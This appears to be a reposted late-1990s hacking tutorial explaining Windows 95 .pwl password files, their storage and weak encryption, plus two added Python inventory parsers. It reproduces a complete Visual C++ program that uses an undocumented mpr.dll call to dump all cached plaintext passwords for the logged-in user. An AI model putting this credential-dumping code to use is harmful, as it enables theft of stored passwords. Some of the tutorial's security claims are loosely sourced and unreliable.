Sep 26, 2019, 11:06 AM

Windows Password Files Torn Apart By Ankit Fadia ankit@bol.net.in

____________________________________________________________________

All Windows users would probably be familiar with the infamous ‘pwl’ files, the files in which the Windows login passwords are stored. This manual aims to simplify how authentication works when you type in your username and password, what exactly .pwl files contain, where exactly they come into the picture, and a whole lot of related things.

The *.pwl files are the files in which the Windows login passwords are stored. They can be found in the \Windows directory, named after the user whose password they contain. For example, if your Windows login username is ankit, then the corresponding password is stored in c:\windows\ankit.pwl. Get it? These .pwl files can be opened in any text editor like Notepad, but they are definitely not understandable. A typical example of the contents of a .pwl file is as follows:

ã‚...-
ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ
ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ
ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿR
p u.ÐX+�|rÐq"±/2³ Êå¡hCJ‚D × `ÍY¥�!íx}(�qW¤ãƱ<!?àÜ6šá˜ôæ4+\3/4õ+%E°ËÔýmÇÔ ÞI»‚ B àלøÐ...'@

This is definitely not something a normal person can comprehend or make sense of.

Now, besides the Windows registry, Microsoft’s policy of security by obscurity can also be seen in the case of .pwl files. Although the .pwl format was originally meant to be a standard used by all applications, Microsoft simply does not officially provide any information on the .pwl file format.

To get a list of the .pwl files on your system, or in other words to find out which passwords stored using the .pwl technology (as a good friend of mine likes to call it) are present on a particular system, simply open c:\windows\system.ini in a plain-text editor like Notepad and look under the [Password Lists] section. A typical line from this section has the following format: USERNAME=Path_of_pwl_file

For example,

[Password Lists]
ankit=c:\windows\ankit.pwl

This tells us that the .pwl file containing the password for the username ‘ankit’ is stored at c:\windows\ankit.pwl.

Anyway, the algorithm used to store information in .pwl files (or rather the .pwl security option) treats such files as databases, with each record consisting of three fields:

Resource name
Resource password
Resource type (0..255)

Before I move on to the details of the above three fields, let us discuss how exactly the user authentication process takes place in Windows (in the case of the login password).

NOTE: The process described below is what happens in the case of the Windows login password.

When you first set up a new account on Windows, it derives an encryption key from the specified password and creates the file c:\windows\username.pwl, where username is, well, quite obvious. One thing to note here is that the .pwl file does not, I repeat does not, store the login password, nor does it store the username (although its name is the same as the username for whose authentication it is used). What it does store will become clearer once you read the paragraph below.

Now, the next time you boot your system and type in your username and password, Windows decrypts the .pwl file corresponding to the username provided, using the decryption key obtained from the password provided. Once the .pwl file has been decrypted with that key, Windows verifies the checksum. If the checksum matches, the user is authenticated; otherwise, try again. In the checksum verification, the username provided plays an important role.

Both the username and the checksum are encrypted using a simple algorithm: RC4.

*****************************

HACKING TRUTH: Although the name of the .pwl file is almost always the same as the username, sometimes the name does differ. For example, if I use 2 to 3 different applications that use .pwl security and use the same username, i.e. ankit, in all of them to store passwords, then the .pwl files would be named as follows:

The first .pwl would be named ankit.pwl, the second ankit000.pwl, the third ankit001.pwl, and so on.

And I am not too sure, but from what I gather, Windows never ever overwrites a .pwl file.

******************************

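Added example (not part of the original tutorial): a small Python inventory that parses the [Password Lists] section of system.ini described above and checks each path against the <username>.pwl and <username>000.pwl naming from the note. The system.ini text, the GUEST entry and the mismatched temp entry are constructed for the example; on a real machine the file would be read from c:\windows\system.ini.

```python
import os

# Constructed system.ini excerpt in the format the tutorial describes (not taken
# from a real machine).  Keys under [Password Lists] are usernames, values are
# .pwl paths; the HACKING TRUTH note says extra lists get a 000, 001, ... suffix.
SAMPLE_SYSTEM_INI = r"""
[boot]
shell=Explorer.exe

[Password Lists]
ankit=c:\windows\ankit.pwl
; comment lines in system.ini start with a semicolon
GUEST=C:\WINDOWS\GUEST000.PWL
temp=c:\windows\tmp001.pwl
"""


def parse_password_lists(ini_text: str) -> dict[str, str]:
    """Return {username: pwl_path}; hand-rolled so username case and backslashes survive."""
    lists, in_section = {}, False
    for raw in ini_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "password lists"
            continue
        if in_section and "=" in line:
            user, path = (part.strip() for part in line.split("=", 1))
            lists[user] = path
    return lists


def name_matches_user(user: str, file_name: str) -> bool:
    """True if file_name is <user>.pwl or <user>NNN.pwl (case-insensitive)."""
    stem, ext = os.path.splitext(file_name.lower())
    user = user.lower()
    if ext != ".pwl" or not stem.startswith(user):
        return False
    extra = stem[len(user):]
    return extra == "" or (len(extra) == 3 and extra.isdigit())


def audit_password_lists(lists: dict[str, str]) -> list[str]:
    """Report entries whose .pwl file name does not follow the username convention."""
    findings = []
    for user, path in lists.items():
        file_name = path.replace("\\", "/").rsplit("/", 1)[-1]  # works off Windows too
        if not name_matches_user(user, file_name):
            findings.append(f"{user}: {file_name} does not follow the <username>.pwl naming")
    return findings
```

An entry that points somewhere other than <username>.pwl is worth a second look, since every file listed here is a cached-credential store for that account.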
Coming back to the fields. Both the resource name and resource password fields can be binary or simply encrypted, and they are interchangeable by the application involved. The Resource Type field can have different numerical values depending upon the software involved. For example, DUN, Dial-Up Server and Windows Login use 6 as the value of the Resource Type field, while Internet Explorer uses 19.

One thing to note about the Windows login password algorithm is that, when it was first introduced, it was very, very weak and allowed passwords to be easily decrypted. With each new release the algorithms used have been improving; however, they still have not reached a reliable level.

Among the algorithms used by various operating systems to encrypt their login passwords, the one used by Windows is the worst. Some common defects are:

The cipher algorithms involved, RC4 and MD5, are relatively lame and can easily be broken. Refer to http://hackingtruths.box.sk\algorithms.htm for more info on various encryption algorithms.
All passwords are converted to uppercase.
Unacceptably lame or weak method of storage.
Various holes exist in the Password Caching facility. The following Visual C++ program demonstrates how this vulnerability can be exploited.

/*
(c) 1997, 98 Vitas Ramanchauskas

Use Visual C++ to compile this into win32 console app.
This code provided for educational purpose only.
!! NO WARRANTY, NO SUPPORT !!
*/
#include <windows.h>
#include <stdio.h>
#include <string.h>   // memmove

// Layout of one cached-password record as handed to the enumeration callback
typedef struct tagPASSWORD_CACHE_ENTRY {
    WORD cbEntry;       // size of this entry, in bytes
    WORD cbResource;    // size of resource name, in bytes
    WORD cbPassword;    // size of password, in bytes
    BYTE iEntry;        // entry index
    BYTE nType;         // type of entry
    BYTE abResource[1]; // start of resource name
    // password immediately follows resource name
} PASSWORD_CACHE_ENTRY;

// Callback and enumerator signatures (the enumerator is undocumented, so it is
// resolved from mpr.dll by name at run time instead of being linked)
typedef BOOL (CALLBACK *ENUMPROC)(PASSWORD_CACHE_ENTRY *, DWORD);
typedef WORD (__stdcall *ENUMCACHED)(LPSTR, WORD, BYTE, ENUMPROC, DWORD);

char *buf, *ob1;
int cnt = 0;

// Called once per cache entry by WNetEnumCachedPasswords
BOOL CALLBACK pce(PASSWORD_CACHE_ENTRY *x, DWORD)
{
    cnt++;
    memmove(buf, x->abResource, x->cbResource);
    buf[x->cbResource] = 0;
    CharToOem(buf, ob1); // for non-English users
    printf("%-30s : ", ob1);

    memmove(buf, x->abResource + x->cbResource, x->cbPassword);
    buf[x->cbPassword] = 0;
    CharToOem(buf, ob1);
    printf("%s\n", ob1);

    return TRUE;
}

int main()
{
    buf = new char[1024];
    ob1 = new char[1024];
    puts("There is no security in this crazy world!\n"
         "Win95 PWL viewer v1.01 (c) 1997, 98 Vitas Ramanchauskas\n"
         "************\n"
         "!DISCLAIMER!\n"
         "!This program intended to be used for legal purpose only!\n"
         "************\n\n"
         "This program shows cached passwords using standard (but undocumented)\n"
         "Windows API on local machine for current user (user must be logged in).\n"
         "You may invoke pwlview in this way: pwlview >> textfile.txt\n"
         "to save passwords in file (don't forget to press enter twice)\n"
         "Press Enter to begin...\n");
    getchar();

    HINSTANCE hi = LoadLibrary("mpr.dll");
    if(!hi)
    {
        puts("Couldn't load mpr.dll. This program is for Windows 95 only");
        return 1;
    }
    ENUMCACHED enp = (ENUMCACHED)GetProcAddress(hi, "WNetEnumCachedPasswords");
    if(!enp)
    {
        puts("Couldn't import function. This program is for Windows 95 only");
        FreeLibrary(hi);
        return 1;
    }
    (*enp)(0, 0, 0xff, pce, 0);   // arguments as in the original: no resource filter, type 0xff
    if(!cnt)
        puts("No passwords found.\n"
             "Probably password caching was not used or user is not logged in.");
    FreeLibrary(hi);
    puts("\nPress Enter to quit");
    getchar();
    delete[] buf;
    delete[] ob1;
    return 0;
}

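Added example, not from the original tutorial or from the viewer above: a Python parser for the PASSWORD_CACHE_ENTRY layout that program declares (WORD cbEntry, WORD cbResource, WORD cbPassword, BYTE iEntry, BYTE nType, then the resource name and the password). It walks a constructed buffer of back-to-back records by cbEntry, which is an assumption made for the sample, and reports resource name, type and password length without carrying the password itself; the type names for 6 and 19 are the ones the tutorial gives, and the resource strings are made up.

```python
import struct
from dataclasses import dataclass

# PASSWORD_CACHE_ENTRY header as declared in the viewer above: WORD cbEntry,
# WORD cbResource, WORD cbPassword, BYTE iEntry, BYTE nType (8 bytes, little-endian
# WORDs), followed by the resource name bytes and then the password bytes.
HEADER = struct.Struct("<HHHBB")
# Resource Type values given in the tutorial; anything else is reported as unknown.
TYPE_NAMES = {6: "DUN / Dial-Up Server / Windows Login", 19: "Internet Explorer"}

@dataclass
class CacheEntry:
    index: int
    ntype: int
    resource: str
    password_len: int  # length only; an inventory should not carry the secret

    @property
    def type_name(self) -> str:
        return TYPE_NAMES.get(self.ntype, f"unknown ({self.ntype})")

def parse_cache_entries(blob: bytes) -> list[CacheEntry]:
    """Walk back-to-back records, advancing by each record's cbEntry (assumed packing)."""
    entries, off = [], 0
    while off < len(blob):
        if off + HEADER.size > len(blob):
            raise ValueError(f"truncated header at offset {off}")
        cb_entry, cb_res, cb_pw, i_entry, n_type = HEADER.unpack_from(blob, off)
        if cb_entry < HEADER.size + cb_res + cb_pw or off + cb_entry > len(blob):
            raise ValueError(f"inconsistent cbEntry={cb_entry} at offset {off}")
        start = off + HEADER.size
        resource = blob[start:start + cb_res].decode("latin-1")
        entries.append(CacheEntry(i_entry, n_type, resource, cb_pw))
        off += cb_entry
    return entries

def build_entry(index: int, ntype: int, resource: bytes, password: bytes, pad: int = 0) -> bytes:
    """Construct one record for the sample; pad models trailing bytes counted in cbEntry."""
    body = resource + password
    header = HEADER.pack(HEADER.size + len(body) + pad, len(resource), len(password), index, ntype)
    return header + body + b"\x00" * pad

# Constructed sample buffer: two records, not data from any real machine.
SAMPLE = (build_entry(0, 6, b"DialUp:MyISP", b"SECRET1", pad=2)
          + build_entry(1, 19, b"http://example.test/", b"LETMEIN"))

if __name__ == "__main__":
    for e in parse_cache_entries(SAMPLE):
        print(f"{e.resource:<24} {e.type_name:<38} password length {e.password_len}")
```
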
Ankit Fadia

Ankit@bol.net.in

http://www.ankitfadia.com

To receive tutorials written by Ankit Fadia on everything you ever dreamt of in your Inbox, join his mailing list by sending a blank email to: programmingforhackers-subscribe@egroups.com

Wanna ask a question? Got a comment to make? Criticize, comment and more... by sending me an Instant Message on MSN Messenger. The ID that I use is: ankit_fadia@hotmail.com